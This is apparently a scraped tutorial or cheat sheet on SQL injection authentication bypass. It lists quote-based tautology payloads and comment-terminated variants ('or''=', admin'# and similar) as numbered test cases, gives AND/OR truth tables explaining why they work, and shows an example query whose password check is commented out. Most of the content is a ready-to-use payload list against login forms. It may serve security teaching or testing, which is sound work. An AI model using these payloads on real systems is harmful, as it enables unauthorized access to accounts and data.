Professional Documents
Culture Documents
SQLinjection - Authentication Bypass
SQLinjection - Authentication Bypass
'or''='
"or""="
')or(''='
")or(""="
username=admin
pwd=admin123
T
AND T
AND
T T T
T F F
F T F
F F F
'or''='
F OR T =T AND F
OR T =T
OR
T T T
T F T
F T T
F F F
TEST CASE 1:
'or''='
TEST CASE 2:
"or""="
TEST CASE 3:
')or(''='
TEST CASE 4:
")or(""="
#comment
-- comment
admin'#
'or''=''#
"or""=""#
')or(''='')#
")or(""="")#
SELECT * FROM users WHERE username='admin'#' AND password='$pwdinp'